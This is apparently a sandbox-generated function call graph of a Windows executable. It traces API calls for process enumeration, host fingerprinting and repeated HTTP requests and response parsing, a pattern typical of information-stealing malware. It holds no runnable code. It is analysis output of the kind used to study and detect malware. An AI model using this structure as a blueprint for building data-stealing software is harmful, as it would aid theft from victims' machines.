API calls 83385->83386 83387 40362d 83386->83387 83388 4047e8 3 API calls 83387->83388 83389 403643 83388->83389 83390 4047e8 3 API calls 83389->83390 83391 40365d 83390->83391 83392 4047e8 3 API calls 83391->83392 83393 403674 83392->83393 83394 4047e8 3 API calls 83393->83394 83395 40368b 83394->83395 83396 4047e8 3 API calls 83395->83396 83397 4036a1 83396->83397 83398 4047e8 3 API calls 83397->83398 83399 4036b8 83398->83399 83400 4047e8 3 API calls 83399->83400 83401 4036cf 83400->83401 83402 4047e8 3 API calls 83401->83402 83403 4036e3 83402->83403 83404 4047e8 3 API calls 83403->83404 83405 4036f9 83404->83405 83406 4047e8 3 API calls 83405->83406 83407 403713 83406->83407 83408 4047e8 3 API calls 83407->83408 83409 40372a 83408->83409 83410 4047e8 3 API calls 83409->83410 83411 403741 83410->83411 83412 4047e8 3 API calls 83411->83412 83413 403758 83412->83413 83414 4047e8 3 API calls 83413->83414 83415 40376f 83414->83415 83416 4047e8 3 API calls 83415->83416 83417 403786 83416->83417 83418 4047e8 3 API calls 83417->83418 83419 40379a 83418->83419 83420 4047e8 3 API calls 83419->83420 83421 4037b1 83420->83421 83422 4047e8 3 API calls 83421->83422 83423 4037cb 83422->83423 83424 4047e8 3 API calls 83423->83424 83425 4037e2 83424->83425 83426 4047e8 3 API calls 83425->83426 83427 4037f6 83426->83427 83428 4047e8 3 API calls 83427->83428 83429 40380a 83428->83429 83430 4047e8 3 API calls 83429->83430 83431 403821 83430->83431 83432 4047e8 3 API calls 83431->83432 83433 403838 83432->83433 83434 4047e8 3 API calls 83433->83434 83435 40384f 83434->83435 83436 4047e8 3 API calls 83435->83436 83437 403866 83436->83437 83438 4047e8 3 API calls 83437->83438 83439 403880 83438->83439 83440 4047e8 3 API calls 83439->83440 83441 403897 83440->83441 83442 4047e8 3 API calls 83441->83442 83443 4038ae 83442->83443 83444 4047e8 3 API calls 83443->83444 83445 4038c5 83444->83445 83446 4047e8 3 API calls 83445->83446 83447 4038db 83446->83447 83448 4047e8 3 API calls 83447->83448 83449 4038f2 83448->83449 83450 4047e8 3 API calls 83449->83450 83451 403906 83450->83451 83452 4047e8 3 API calls 83451->83452 83453 40391d 83452->83453 83454 4047e8 3 API calls 83453->83454 83455 403937 83454->83455 83456 4047e8 3 API calls 83455->83456 83457 40394e 83456->83457 83458 4047e8 3 API calls 83457->83458 83459 403965 83458->83459 83460 4047e8 3 API calls 83459->83460 83461 40397c 83460->83461 83462 4047e8 3 API calls 83461->83462 83463 403993 83462->83463 83464 4047e8 3 API calls 83463->83464 83465 4039aa 83464->83465 83466 4047e8 3 API calls 83465->83466 83467 4039c1 83466->83467 83468 4047e8 3 API calls 83467->83468 83469 4039d8 83468->83469 83470 4047e8 3 API calls 83469->83470 83471 4039f2 83470->83471 83472 4047e8 3 API calls 83471->83472 83473 403a09 83472->83473 83474 4047e8 3 API calls 83473->83474 83475 403a20 83474->83475 83476 4047e8 3 API calls 83475->83476 83477 403a37 83476->83477 83478 4047e8 3 API calls 83477->83478 83479 403a4e 83478->83479 83480 4047e8 3 API calls 83479->83480 83481 403a65 83480->83481 83482 4047e8 3 API calls 83481->83482 83483 403a7c 83482->83483 83484 4047e8 3 API calls 83483->83484 83485 403a90 83484->83485 83486 4047e8 3 API calls 83485->83486 83487 403aaa 83486->83487 83488 4047e8 3 API calls 83487->83488 83489 403ac1 83488->83489 83490 4047e8 3 API calls 83489->83490 83491 403ad7 83490->83491 83492 4047e8 3 API calls 83491->83492 83493 403aee 83492->83493 83494 4047e8 3 API calls 83493->83494 83495 403b05 83494->83495 83496 4047e8 3 API calls 83495->83496 83497 403b1c 83496->83497 83498 4047e8 3 API calls 83497->83498 83499 403b33 83498->83499 83500 4047e8 3 API calls 83499->83500 83501 403b4a 83500->83501 83502 4047e8 3 API calls 83501->83502 83503 403b61 83502->83503 83504 4047e8 3 API calls 83503->83504 83505 403b75 83504->83505 83506 4047e8 3 API calls 83505->83506 83507 403b8c 83506->83507 83508 4047e8 3 API calls 83507->83508 83509 403ba3 83508->83509 83510 4047e8 3 API calls 83509->83510 83511 403bba 83510->83511 83512 4047e8 3 API calls 83511->83512 83513 403bd1 83512->83513 83514 4047e8 3 API calls 83513->83514 83515 403be8 83514->83515 83516 4047e8 3 API calls 83515->83516 83517 403bff 83516->83517 83518 4047e8 3 API calls 83517->83518 83519 403c19 83518->83519 83520 4047e8 3 API calls 83519->83520 83521 403c30 83520->83521 83522 4047e8 3 API calls 83521->83522 83523 403c47 83522->83523 83524 4047e8 3 API calls 83523->83524 83525 403c5e 83524->83525 83526 4047e8 3 API calls 83525->83526 83527 403c75 83526->83527 83528 4047e8 3 API calls 83527->83528 83529 403c8c 83528->83529 83530 4047e8 3 API calls 83529->83530 83531 403ca3 83530->83531 83532 4047e8 3 API calls 83531->83532 83533 403cb7 83532->83533 83534 4047e8 3 API calls 83533->83534 83535 403cd1 83534->83535 83536 4047e8 3 API calls 83535->83536 83537 403ce8 83536->83537 83538 4047e8 3 API calls 83537->83538 83539 403cff 83538->83539 83540 4047e8 3 API calls 83539->83540 83541 403d16 83540->83541 83542 4047e8 3 API calls 83541->83542 83543 403d2c 83542->83543 83544 4047e8 3 API calls 83543->83544 83545 403d43 83544->83545 83546 4047e8 3 API calls 83545->83546 83547 403d57 83546->83547 83548 4047e8 3 API calls 83547->83548 83549 403d6e 83548->83549 83550 4047e8 3 API calls 83549->83550 83551 403d85 83550->83551 83552 4047e8 3 API calls 83551->83552 83553 403d9c 83552->83553 83554 4047e8 3 API calls 83553->83554 83555 403db3 83554->83555 83556 4047e8 3 API calls 83555->83556 83557 403dca 83556->83557 83558 4047e8 3 API calls 83557->83558 83559 403de1 83558->83559 83560 4047e8 3 API calls 83559->83560 83561 403df8 83560->83561 83562 4047e8 3 API calls 83561->83562 83563 403e0f 83562->83563 83564 4047e8 3 API calls 83563->83564 83565 403e26 83564->83565 83566 4047e8 3 API calls 83565->83566 83567 403e40 83566->83567 83568 4047e8 3 API calls 83567->83568 83569 403e57 83568->83569 83570 4047e8 3 API calls 83569->83570 83571 403e6e 83570->83571 83572 4047e8 3 API calls 83571->83572 83573 403e84 83572->83573 83574 4047e8 3 API calls 83573->83574 83575 403e9b 83574->83575 83576 4047e8 3 API calls 83575->83576 83577 403eb2 83576->83577 83578 4047e8 3 API calls 83577->83578 83579 403ec9 83578->83579 83580 4047e8 3 API calls 83579->83580 83581 403ee0 83580->83581 83582 4047e8 3 API calls 83581->83582 83583 403efa 83582->83583 83584 4047e8 3 API calls 83583->83584 83585 403f10 83584->83585 83586 4047e8 3 API calls 83585->83586 83587 403f27 83586->83587 83588 4047e8 3 API calls 83587->83588 83589 403f3e 83588->83589 83590 4047e8 3 API calls 83589->83590 83591 403f55 83590->83591 83592 4047e8 3 API calls 83591->83592 83593 403f6c 83592->83593 83594 4047e8 3 API calls 83593->83594 83595 403f80 83594->83595 83596 4047e8 3 API calls 83595->83596 83597 403f97 83596->83597 83598 4047e8 3 API calls 83597->83598 83599 403fb1 83598->83599 83600 4047e8 3 API calls 83599->83600 83601 403fc7 83600->83601 83602 4047e8 3 API calls 83601->83602 83603 403fde 83602->83603 83604 4047e8 3 API calls 83603->83604 83605 403ff2 83604->83605 83606 4047e8 3 API calls 83605->83606 83607 404009 83606->83607 83608 4047e8 3 API calls 83607->83608 83609 404020 83608->83609 83610 4047e8 3 API calls 83609->83610 83611 404037 83610->83611 83612 4047e8 3 API calls 83611->83612 83613 40404e 83612->83613 83614 4047e8 3 API calls 83613->83614 83615 404067 83614->83615 83616 4047e8 3 API calls 83615->83616 83617 40407e 83616->83617 83618 4047e8 3 API calls 83617->83618 83619 404094 83618->83619 83620 4047e8 3 API calls 83619->83620 83621 4040a8 83620->83621 83622 4047e8 3 API calls 83621->83622 83623 4040bf 83622->83623 83624 4047e8 3 API calls 83623->83624 83625 4040d6 83624->83625 83626 4047e8 3 API calls 83625->83626 83627 4040ed 83626->83627 83628 4047e8 3 API calls 83627->83628 83629 404104 83628->83629 83630 4047e8 3 API calls 83629->83630 83631 40411e 83630->83631 83632 4047e8 3 API calls 83631->83632 83633 404135 83632->83633 83634 4047e8 3 API calls 83633->83634 83635 40414c 83634->83635 83636 4047e8 3 API calls 83635->83636 83637 404163 83636->83637 83638 4047e8 3 API calls 83637->83638 83639 404179 83638->83639 83640 4047e8 3 API calls 83639->83640 83641 40418d 83640->83641 83642 4047e8 3 API calls 83641->83642 83643 4041a1 83642->83643 83644 4047e8 3 API calls 83643->83644 83645 4041b8 83644->83645 83646 4047e8 3 API calls 83645->83646 83647 4041d2 83646->83647 83648 4047e8 3 API calls 83647->83648 83649 4041e8 83648->83649 83650 4047e8 3 API calls 83649->83650 83651 4041ff 83650->83651 83652 4047e8 3 API calls 83651->83652 83653 404216 83652->83653 83654 4047e8 3 API calls 83653->83654 83655 40422d 83654->83655 83656 4047e8 3 API calls 83655->83656 83657 404244 83656->83657 83658 4047e8 3 API calls 83657->83658 83659 404258 83658->83659 83660 4047e8 3 API calls 83659->83660 83661 40426e 83660->83661 83662 4047e8 3 API calls 83661->83662 83663 404288 83662->83663 83664 4047e8 3 API calls 83663->83664 83665 40429f 83664->83665 83666 4047e8 3 API calls 83665->83666 83667 4042b6 83666->83667 83668 4047e8 3 API calls 83667->83668 83669 4042cc 83668->83669 83670 4047e8 3 API calls 83669->83670 83671 4042e3 83670->83671 83672 4047e8 3 API calls 83671->83672 83673 4042fa 83672->83673 83674 4047e8 3 API calls 83673->83674 83675 404311 83674->83675 83676 4047e8 3 API calls 83675->83676 83677 404325 83676->83677 83678 4047e8 3 API calls 83677->83678 83679 40433c 83678->83679 83680 4047e8 3 API calls 83679->83680 83681 404353 83680->83681 83682 4047e8 3 API calls 83681->83682 83683 40436a 83682->83683 83684 4047e8 3 API calls 83683->83684 83685 404381 83684->83685 83686 4047e8 3 API calls 83685->83686 83687 404395 83686->83687 83688 4047e8 3 API calls 83687->83688 83689 4043ac 83688->83689 83690 4047e8 3 API calls 83689->83690 83691 4043c3 83690->83691 83692 4047e8 3 API calls 83691->83692 83693 4043da 83692->83693 83694 4047e8 3 API calls 83693->83694 83695 4043f1 83694->83695 83696 4047e8 3 API calls 83695->83696 83697 404408 83696->83697 83698 4047e8 3 API calls 83697->83698 83699 40441c 83698->83699 83700 4047e8 3 API calls 83699->83700 83701 404433 83700->83701 83702 4047e8 3 API calls 83701->83702 83703 40444a 83702->83703 83704 4047e8 3 API calls 83703->83704 83705 40445e 83704->83705 83706 4047e8 3 API calls 83705->83706 83707 404472 83706->83707 83708 4047e8 3 API calls 83707->83708 83709 404486 83708->83709 83710 4047e8 3 API calls 83709->83710 83711 4044a0 83710->83711 83712 4047e8 3 API calls 83711->83712 83713 4044b7 83712->83713 83714 4047e8 3 API calls 83713->83714 83715 4044cd 83714->83715 83716 4047e8 3 API calls 83715->83716 83717 4044e4 83716->83717 83718 4047e8 3 API calls 83717->83718 83719 4044fa 83718->83719 83720 4047e8 3 API calls 83719->83720 83721 404511 83720->83721 83722 4047e8 3 API calls 83721->83722 83723 404528 83722->83723 83724 4047e8 3 API calls 83723->83724 83725 40453e 83724->83725 83726 4047e8 3 API calls 83725->83726 83727 404558 83726->83727 83728 4047e8 3 API calls 83727->83728 83729 40456f 83728->83729 83730 4047e8 3 API calls 83729->83730 83731 404586 83730->83731 83732 4047e8 3 API calls 83731->83732 83733 40459d 83732->83733 83734 4047e8 3 API calls 83733->83734 83735 4045b4 83734->83735 83736 4047e8 3 API calls 83735->83736 83737 4045cb 83736->83737 83738 4047e8 3 API calls 83737->83738 83739 4045e2 83738->83739 83740 4047e8 3 API calls 83739->83740 83741 4045f9 83740->83741 83742 4047e8 3 API calls 83741->83742 83743 404612 83742->83743 83744 4047e8 3 API calls 83743->83744 83745 404629 83744->83745 83746 4047e8 3 API calls 83745->83746 83747 404642 83746->83747 83748 4047e8 3 API calls 83747->83748 83749 404656 83748->83749 83750 4047e8 3 API calls 83749->83750 83751 40466d 83750->83751 83752 4047e8 3 API calls 83751->83752 83753 404684 83752->83753 83754 4047e8 3 API calls 83753->83754 83755 40469b 83754->83755 83756 4047e8 3 API calls 83755->83756 83757 4046b2 83756->83757 83758 4047e8 3 API calls 83757->83758 83759 4046cc 83758->83759 83760 4047e8 3 API calls 83759->83760 83761 4046e3 83760->83761 83762 4047e8 3 API calls 83761->83762 83763 4046f9 83762->83763 83764 4047e8 3 API calls 83763->83764 83765 404710 83764->83765 83766 4047e8 3 API calls 83765->83766 83767 404727 83766->83767 83768 4047e8 3 API calls 83767->83768 83769 40473d 83768->83769 83770 4047e8 3 API calls 83769->83770 83771 404754 83770->83771 83772 4047e8 3 API calls 83771->83772 83773 404768 83772->83773 83774 4047e8 3 API calls 83773->83774 83775 404781 83774->83775 83776 4047e8 3 API calls 83775->83776 83777 404797 83776->83777 83778 4047e8 3 API calls 83777->83778 83779 4047ae 83778->83779 83780 4047e8 3 API calls 83779->83780 83781 4047c5 83780->83781 83782 4047e8 3 API calls 83781->83782 83783 4047dc 83782->83783 83783->82800 85102 42f109 83784->85102 83786 41258e CreateToolhelp32Snapshot Process32First 83787 4125c2 Process32Next 83786->83787 83788 4125ef CloseHandle 83786->83788 83787->83788 83790 4125d4 StrCmpCA 83787->83790 85103 42f165 83788->85103 83790->83787 83792 4125e6 83790->83792 83792->83787 83794 4104e7 lstrcpyA 83793->83794 83795 411c67 83794->83795 83796 4104e7 lstrcpyA 83795->83796 83797 411c75 GetSystemTime 83796->83797 83798 411c91 83797->83798 83799 41d016 _CountryEnumProc@4 5 API calls 83798->83799 83800 411cc8 83799->83800 83800->82806 83803 4105e1 83801->83803 83802 410605 83802->82822 83803->83802 83804 4105f3 lstrcpyA lstrcatA 83803->83804 83804->83802 83806 410519 lstrcpyA 83805->83806 83807 401d07 83806->83807 83808 410519 lstrcpyA 83807->83808 83809 401d12 83808->83809 83810 410519 lstrcpyA 83809->83810 83811 401d1d 83810->83811 83812 410519 lstrcpyA 83811->83812 83813 401d34 83812->83813 83814 4169b6 83813->83814 83815 410549 2 API calls 83814->83815 83816 4169ec 83815->83816 83817 410549 2 API calls 83816->83817 83818 4169f9 83817->83818 83819 410549 2 API calls 83818->83819 83820 416a06 83819->83820 83821 4104e7 lstrcpyA 83820->83821 83822 416a13 83821->83822 83823 4104e7 lstrcpyA 83822->83823 83824 416a20 83823->83824 83825 4104e7 lstrcpyA 83824->83825 83826 416a2d 83825->83826 83827 4104e7 lstrcpyA 83826->83827 83828 416a3a 83827->83828 83829 4104e7 lstrcpyA 83828->83829 83830 416a47 83829->83830 83831 4104e7 lstrcpyA 83830->83831 83871 416a54 83831->83871 83834 401cfd lstrcpyA 83834->83871 83835 416a98 StrCmpCA 83836 416af1 StrCmpCA 83835->83836 83835->83871 83837 416cd4 83836->83837 83836->83871 83840 41058d lstrcpyA 83837->83840 83841 416cdf 83840->83841 83843 4104e7 lstrcpyA 83841->83843 83844 416cec 83843->83844 83845 41058d lstrcpyA 83844->83845 83846 416c2c 83845->83846 83850 4104e7 lstrcpyA 83846->83850 83847 41683e 28 API calls 83847->83871 83848 4168c6 33 API calls 83848->83871 83849 41058d lstrcpyA 83849->83871 83851 416d0b 83850->83851 83853 41058d lstrcpyA 83851->83853 83852 416b51 StrCmpCA 83854 416baa StrCmpCA 83852->83854 83852->83871 83855 416d15 83853->83855 83857 416bc0 StrCmpCA 83854->83857 83858 416ca3 83854->83858 85115 416da2 83855->85115 83860 416c72 83857->83860 83861 416bd6 StrCmpCA 83857->83861 83859 41058d lstrcpyA 83858->83859 83867 416cae 83859->83867 83865 41058d lstrcpyA 83860->83865 83862 416be8 StrCmpCA 83861->83862 83863 416c3e 83861->83863 83869 416c0a 83862->83869 83870 416bfa Sleep 83862->83870 83873 41058d lstrcpyA 83863->83873 83864 410519 lstrcpyA 83864->83871 83872 416c7d 83865->83872 83868 4104e7 lstrcpyA 83867->83868 83874 416cbb 83868->83874 83875 41058d lstrcpyA 83869->83875 83870->83871 83871->83834 83871->83835 83871->83836 83871->83847 83871->83848 83871->83849 83871->83852 83871->83854 83871->83864 85106 4029f8 83871->85106 85109 402a09 83871->85109 85112 402a1a 83871->85112 85122 402a2b lstrcpyA 83871->85122 85123 402a3c lstrcpyA 83871->85123 85124 402a4d lstrcpyA 83871->85124 83876 4104e7 lstrcpyA 83872->83876 83877 416c49 83873->83877 83878 41058d lstrcpyA 83874->83878 83879 416c15 83875->83879 83880 416c8a 83876->83880 83881 4104e7 lstrcpyA 83877->83881 83878->83846 83882 4104e7 lstrcpyA 83879->83882 83883 41058d lstrcpyA 83880->83883 83884 416c56 83881->83884 83886 416c22 83882->83886 83883->83846 83885 41058d lstrcpyA 83884->83885 83885->83846 83887 41058d lstrcpyA 83886->83887 83887->83846 83888 416d28 83888->82833 83890 41058d lstrcpyA 83889->83890 83891 418257 83890->83891 83892 41058d lstrcpyA 83891->83892 83893 418262 83892->83893 83894 41058d lstrcpyA 83893->83894 83895 41826d 83894->83895 83895->82838 83897 410529 83896->83897 83898 41053e 83897->83898 83899 410536 lstrcpyA 83897->83899 83898->82850 83899->83898 83901 4109e6 GetVolumeInformationA 83900->83901 83902 4109df 83900->83902 83903 410a4d 83901->83903 83902->83901 83903->83903 83904 410a62 GetProcessHeap HeapAlloc 83903->83904 83905 410a7d 83904->83905 83906 410a8c wsprintfA lstrcatA 83904->83906 83907 4104e7 lstrcpyA 83905->83907 85125 411684 GetCurrentHwProfileA 83906->85125 83909 410a85 83907->83909 83912 41d016 _CountryEnumProc@4 5 API calls 83909->83912 83910 410ac7 lstrlenA 85141 4123d5 lstrcpyA malloc strncpy 83910->85141 83914 410b2e 83912->83914 83913 410aea lstrcatA 83915 410b01 83913->83915 83914->82876 83916 4104e7 lstrcpyA 83915->83916 83917 410b18 83916->83917 83917->83909 83919 410519 lstrcpyA 83918->83919 83920 404b59 83919->83920 85145 404ab6 83920->85145 83922 404b65 83923 4104e7 lstrcpyA 83922->83923 83924 404b81 83923->83924 83925 4104e7 lstrcpyA 83924->83925 83926 404b91 83925->83926 83927 4104e7 lstrcpyA 83926->83927 83928 404ba1 83927->83928 83929 4104e7 lstrcpyA 83928->83929 83930 404bb1 83929->83930 83931 4104e7 lstrcpyA 83930->83931 83932 404bc1 InternetOpenA StrCmpCA 83931->83932 83933 404bf5 83932->83933 83934 405194 InternetCloseHandle 83933->83934 83935 411c4a 7 API calls 83933->83935 83945 4051e1 83934->83945 83936 404c15 83935->83936 83937 4105c7 2 API calls 83936->83937 83938 404c28 83937->83938 83939 41058d lstrcpyA 83938->83939 83940 404c33 83939->83940 83941 410609 3 API calls 83940->83941 83942 404c5f 83941->83942 83943 41058d lstrcpyA 83942->83943 83944 404c6a 83943->83944 83947 410609 3 API calls 83944->83947 83946 41d016 _CountryEnumProc@4 5 API calls 83945->83946 83949 405235 83946->83949 83948 404c8b 83947->83948 83950 41058d lstrcpyA 83948->83950 84051 4139c2 StrCmpCA 83949->84051 83951 404c96 83950->83951 83952 4105c7 2 API calls 83951->83952 83953 404cb8 83952->83953 83954 41058d lstrcpyA 83953->83954 83955 404cc3 83954->83955 83956 410609 3 API calls 83955->83956 83957 404ce4 83956->83957 83958 41058d lstrcpyA 83957->83958 83959 404cef 83958->83959 83960 410609 3 API calls 83959->83960 83961 404d10 83960->83961 83962 41058d lstrcpyA 83961->83962 83963 404d1b 83962->83963 83964 410609 3 API calls 83963->83964 83965 404d3d 83964->83965 83966 4105c7 2 API calls 83965->83966 83967 404d48 83966->83967 83968 41058d lstrcpyA 83967->83968 83969 404d53 83968->83969 83970 404d69 InternetConnectA 83969->83970 83970->83934 83971 404d97 HttpOpenRequestA 83970->83971 83972 404dd7 83971->83972 83973 405188 InternetCloseHandle 83971->83973 83974 404dfb 83972->83974 83975 404ddf InternetSetOptionA 83972->83975 83973->83934 83976 410609 3 API calls 83974->83976 83975->83974 83977 404e11 83976->83977 83978 41058d lstrcpyA 83977->83978 83979 404e1c 83978->83979 83980 4105c7 2 API calls 83979->83980 83981 404e3e 83980->83981 83982 41058d lstrcpyA 83981->83982 83983 404e49 83982->83983 83984 410609 3 API calls 83983->83984 83985 404e6a 83984->83985 83986 41058d lstrcpyA 83985->83986 83987 404e75 83986->83987 83988 410609 3 API calls 83987->83988 83989 404e97 83988->83989 83990 41058d lstrcpyA 83989->83990 83991 404ea2 83990->83991 83992 410609 3 API calls 83991->83992 83993 404ec3 83992->83993 83994 41058d lstrcpyA 83993->83994 83995 404ece 83994->83995 83996 410609 3 API calls 83995->83996 83997 404eef 83996->83997 83998 41058d lstrcpyA 83997->83998 83999 404efa 83998->83999 84000 4105c7 2 API calls 83999->84000 84001 404f19 84000->84001 84002 41058d lstrcpyA 84001->84002 84003 404f24 84002->84003 84004 410609 3 API calls 84003->84004 84005 404f45 84004->84005 84006 41058d lstrcpyA 84005->84006 84007 404f50 84006->84007 84008 410609 3 API calls 84007->84008 84009 404f71 84008->84009 84010 41058d lstrcpyA 84009->84010 84011 404f7c 84010->84011 84012 4105c7 2 API calls 84011->84012 84013 404f9e 84012->84013 84014 41058d lstrcpyA 84013->84014 84015 404fa9 84014->84015 84016 410609 3 API calls 84015->84016 84017 404fca 84016->84017 84018 41058d lstrcpyA 84017->84018 84019 404fd5 84018->84019 84020 410609 3 API calls 84019->84020 84021 404ff7 84020->84021 84022 41058d lstrcpyA 84021->84022 84023 405002 84022->84023 84024 410609 3 API calls 84023->84024 84025 405023 84024->84025 84026 41058d lstrcpyA 84025->84026 84027 40502e 84026->84027 84028 410609 3 API calls 84027->84028 84029 40504f 84028->84029 84030 41058d lstrcpyA 84029->84030 84031 40505a 84030->84031 84032 4105c7 2 API calls 84031->84032 84033 405079 84032->84033 84034 41058d lstrcpyA 84033->84034 84035 405084 84034->84035 84036 4104e7 lstrcpyA 84035->84036 84037 40509f 84036->84037 84038 4105c7 2 API calls 84037->84038 84039 4050b6 84038->84039 84040 4105c7 2 API calls 84039->84040 84041 4050c7 84040->84041 84042 41058d lstrcpyA 84041->84042 84043 4050d2 84042->84043 84044 4050e8 lstrlenA lstrlenA HttpSendRequestA 84043->84044 84045 40515c InternetReadFile 84044->84045 84046 405176 InternetCloseHandle 84045->84046 84049 40511c 84045->84049 84047 402920 84046->84047 84047->83973 84048 410609 3 API calls 84048->84049 84049->84045 84049->84046 84049->84048 84050 41058d lstrcpyA 84049->84050 84050->84049 84052 4139e1 ExitProcess 84051->84052 84053 4139e8 strtok_s 84051->84053 84054 413a04 84053->84054 84055 413b48 84053->84055 84056 413b2a strtok_s 84054->84056 84057 413a21 StrCmpCA 84054->84057 84058 413a75 StrCmpCA 84054->84058 84059 413ab4 StrCmpCA 84054->84059 84060 413af4 StrCmpCA 84054->84060 84061 413b16 StrCmpCA 84054->84061 84062 413a59 StrCmpCA 84054->84062 84063 413ac9 StrCmpCA 84054->84063 84064 413a3d StrCmpCA 84054->84064 84065 413a9f StrCmpCA 84054->84065 84066 413ade StrCmpCA 84054->84066 84067 410549 2 API calls 84054->84067 84055->82885 84056->84054 84056->84055 84057->84054 84057->84056 84058->84054 84058->84056 84059->84054 84059->84056 84060->84056 84061->84056 84062->84054 84062->84056 84063->84054 84063->84056 84064->84054 84064->84056 84065->84054 84065->84056 84066->84056 84067->84054 84069 410519 lstrcpyA 84068->84069 84070 405f64 84069->84070 84071 404ab6 5 API calls 84070->84071 84072 405f70 84071->84072 84073 4104e7 lstrcpyA 84072->84073 84074 405f8c 84073->84074 84075 4104e7 lstrcpyA 84074->84075 84076 405f9c 84075->84076 84077 4104e7 lstrcpyA 84076->84077 84078 405fac 84077->84078 84079 4104e7 lstrcpyA 84078->84079 84080 405fbc 84079->84080 84081 4104e7 lstrcpyA 84080->84081 84082 405fcc InternetOpenA StrCmpCA 84081->84082 84083 406000 84082->84083 84084 4066ff InternetCloseHandle 84083->84084 84086 411c4a 7 API calls 84083->84086 85151 408048 CryptStringToBinaryA 84084->85151 84087 406020 84086->84087 84089 4105c7 2 API calls 84087->84089 84090 406033 84089->84090 84093 41058d lstrcpyA 84090->84093 84091 410549 2 API calls 84092 406739 84091->84092 84094 410609 3 API calls 84092->84094 84097 40603e 84093->84097 84095 406750 84094->84095 84096 41058d lstrcpyA 84095->84096 84102 40675b 84096->84102 84098 410609 3 API calls 84097->84098 84099 40606a 84098->84099 84100 41058d lstrcpyA 84099->84100 84101 406075 84100->84101 84104 410609 3 API calls 84101->84104 84103 41d016 _CountryEnumProc@4 5 API calls 84102->84103 84105 4067eb 84103->84105 84106 406096 84104->84106 84235 41343f strtok_s 84105->84235 84107 41058d lstrcpyA 84106->84107 84108 4060a1 84107->84108 84109 4105c7 2 API calls 84108->84109 84110 4060c3 84109->84110 84111 41058d lstrcpyA 84110->84111 84112 4060ce 84111->84112 84113 410609 3 API calls 84112->84113 84114 4060ef 84113->84114 84115 41058d lstrcpyA 84114->84115 84116 4060fa 84115->84116 84117 410609 3 API calls 84116->84117 84118 40611b 84117->84118 84119 41058d lstrcpyA 84118->84119 84120 406126 84119->84120 84121 410609 3 API calls 84120->84121 84122 406148 84121->84122 84123 4105c7 2 API calls 84122->84123 84124 406153 84123->84124 84125 41058d lstrcpyA 84124->84125 84126 40615e 84125->84126 84127 406174 InternetConnectA 84126->84127 84127->84084 84128 4061a2 HttpOpenRequestA 84127->84128 84129 4061e2 84128->84129 84130 4066f3 InternetCloseHandle 84128->84130 84131 406206 84129->84131 84132 4061ea InternetSetOptionA 84129->84132 84130->84084 84133 410609 3 API calls 84131->84133 84132->84131 84134 40621c 84133->84134 84135 41058d lstrcpyA 84134->84135 84136 406227 84135->84136 84137 4105c7 2 API calls 84136->84137 84138 406249 84137->84138 84139 41058d lstrcpyA 84138->84139 84140 406254 84139->84140 84141 410609 3 API calls 84140->84141 84142 406275 84141->84142 84143 41058d lstrcpyA 84142->84143 84144 406280 84143->84144 84145 410609 3 API calls 84144->84145 84146 4062a2 84145->84146 84147 41058d lstrcpyA 84146->84147 84148 4062ad 84147->84148 84149 410609 3 API calls 84148->84149 84150 4062cf 84149->84150 84151 41058d lstrcpyA 84150->84151 84152 4062da 84151->84152 84153 410609 3 API calls 84152->84153 84154 4062fb 84153->84154 84155 41058d lstrcpyA 84154->84155 84156 406306 84155->84156 84157 4105c7 2 API calls 84156->84157 84158 406325 84157->84158 84159 41058d lstrcpyA 84158->84159 84160 406330 84159->84160 84161 410609 3 API calls 84160->84161 84162 406351 84161->84162 84163 41058d lstrcpyA 84162->84163 84164 40635c 84163->84164 84165 410609 3 API calls 84164->84165 84166 40637d 84165->84166 84167 41058d lstrcpyA 84166->84167 84168 406388 84167->84168 84169 4105c7 2 API calls 84168->84169 84170 4063aa 84169->84170 84171 41058d lstrcpyA 84170->84171 84172 4063b5 84171->84172 84173 410609 3 API calls 84172->84173 84174 4063d6 84173->84174 84175 41058d lstrcpyA 84174->84175 84176 4063e1 84175->84176 84177 410609 3 API calls 84176->84177 84178 406403 84177->84178 84179 41058d lstrcpyA 84178->84179 84180 40640e 84179->84180 84181 410609 3 API calls 84180->84181 84182 40642f 84181->84182 84183 41058d lstrcpyA 84182->84183 84184 40643a 84183->84184 84185 410609 3 API calls 84184->84185 84186 40645b 84185->84186 84187 41058d lstrcpyA 84186->84187 84188 406466 84187->84188 84189 410609 3 API calls 84188->84189 84190 406487 84189->84190 84191 41058d lstrcpyA 84190->84191 84192 406492 84191->84192 84193 410609 3 API calls 84192->84193 84194 4064b3 84193->84194 84195 41058d lstrcpyA 84194->84195 84196 4064be 84195->84196 84197 410609 3 API calls 84196->84197 84198 4064df 84197->84198 84199 41058d lstrcpyA 84198->84199 84200 4064ea 84199->84200 84201 4105c7 2 API calls 84200->84201 84202 406506 84201->84202 84203 41058d lstrcpyA 84202->84203 84204 406511 84203->84204 84205 410609 3 API calls 84204->84205 84206 406532 84205->84206 84207 41058d lstrcpyA 84206->84207 84208 40653d 84207->84208 84209 410609 3 API calls 84208->84209 84210 40655f 84209->84210 84211 41058d lstrcpyA 84210->84211 84212 40656a 84211->84212 84213 410609 3 API calls 84212->84213 84214 40658b 84213->84214 84215 41058d lstrcpyA 84214->84215 84216 406596 84215->84216 84217 410609 3 API calls 84216->84217 84218 4065b7 84217->84218 84219 41058d lstrcpyA 84218->84219 84220 4065c2 84219->84220 84221 4105c7 2 API calls 84220->84221 84222 4065e1 84221->84222 84223 41058d lstrcpyA 84222->84223 84224 4065ec 84223->84224 84225 4065f7 lstrlenA lstrlenA GetProcessHeap HeapAlloc lstrlenA 84224->84225 85149 427050 84225->85149 84228 427050 _memmove 84229 406667 lstrlenA HttpSendRequestA 84228->84229 84230 4066d2 InternetReadFile 84229->84230 84231 406692 84230->84231 84232 4066ec InternetCloseHandle 84230->84232 84231->84230 84231->84232 84233 410609 3 API calls 84231->84233 84234 41058d lstrcpyA 84231->84234 84232->84130 84233->84231 84234->84231 84236 4134cc 84235->84236 84240 41346e 84235->84240 84236->82899 84237 4134b6 strtok_s 84237->84236 84237->84240 84238 410549 2 API calls 84238->84237 84239 410549 2 API calls 84239->84240 84240->84237 84240->84238 84240->84239 84244 413286 84241->84244 84242 413385 84242->82913 84243 413332 StrCmpCA 84243->84244 84244->84242 84244->84243 84245 410549 2 API calls 84244->84245 84246 413367 strtok_s 84244->84246 84247 413301 StrCmpCA 84244->84247 84248 4132dc StrCmpCA 84244->84248 84249 4132ab StrCmpCA 84244->84249 84245->84244 84246->84244 84247->84244 84248->84244 84249->84244 84251 413434 84250->84251 84252 4133bc 84250->84252 84251->82925 84253 410549 2 API calls 84252->84253 84254 4133e2 StrCmpCA 84252->84254 84255 41341a strtok_s 84252->84255 84256 410549 2 API calls 84252->84256 84253->84255 84254->84252 84255->84251 84255->84252 84256->84252 84258 